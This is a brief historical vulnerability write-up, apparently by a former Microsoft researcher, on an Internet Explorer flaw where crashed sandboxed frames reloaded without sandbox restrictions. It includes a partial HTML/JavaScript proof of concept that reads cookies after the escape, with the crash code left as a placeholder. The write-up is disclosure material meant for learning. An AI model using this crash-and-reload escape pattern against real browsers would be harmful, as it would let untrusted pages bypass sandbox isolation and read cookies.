I found that when a sandboxed window or tab crashed, IE automatically reloaded it — but the reload did not re-apply the sandbox flags. This meant that any denial-of-service vulnerability could be used as a sandbox escape: crash the sandboxed context, wait for the automatic reload, and the page now ran without restrictions. The PoC used the crash from bug Win8 #505970 as its trigger.

<!-- index.html -->
<iframe sandbox="allow-scripts allow-popups" src="sandboxed.html"></iframe>
<script>
document.cookie = "COOKIE WAS SET BY THE TOP-OPENER WINDOW";
</script>

<!-- sandboxed.html (the same code runs in the popup it opens) -->
<script>
try
{
    // If we aren't sandboxed, reading document.cookie succeeds and the alert shows it.
    alert(document.cookie);
}
catch (e)
{
    // Otherwise we are sandboxed (the cookie read threw), so crash the tab;
    // IE then reloads it automatically, this time without the sandbox.
    // [Crash code from Win8 #505970]
}
</script>

After the crash and automatic reload, document.cookie in the previously sandboxed popup was accessible, demonstrating that the sandbox was not restored on reload.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.